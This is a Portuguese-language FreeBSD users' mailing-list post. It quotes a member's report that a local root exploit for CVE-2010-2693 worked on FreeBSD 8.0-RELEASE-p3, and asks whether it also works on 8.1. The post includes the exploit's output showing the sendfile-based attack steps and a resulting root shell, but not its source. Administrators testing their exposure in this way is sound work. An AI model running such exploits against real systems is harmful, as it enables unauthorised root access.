2010/8/22 Leandro Keffer <keffer...@gmail.com> > Testado em um 8.0 branch 3 e funcionando : ( > > FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue > May 25 20:54:11 UTC 2010 > r...@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC > amd64 > > [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 > [+] checking for setuid /usr/bin/su binary... > [+] checking for suitable libc library in /lib... > [+] found libc at /lib/libc.so.7 > [+] found getuid function at 0x00056990 > [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 > [+] spawning listener thread... > [+] connecting to listener thread... > [+] initiating exploit via sendfile... > [+] exploit complete! > [+] spawning root shell... > fbsd80# id > uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) > > Sabe se rola no 8.1-RELEASE?
-- Renato Botelho ------------------------- Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd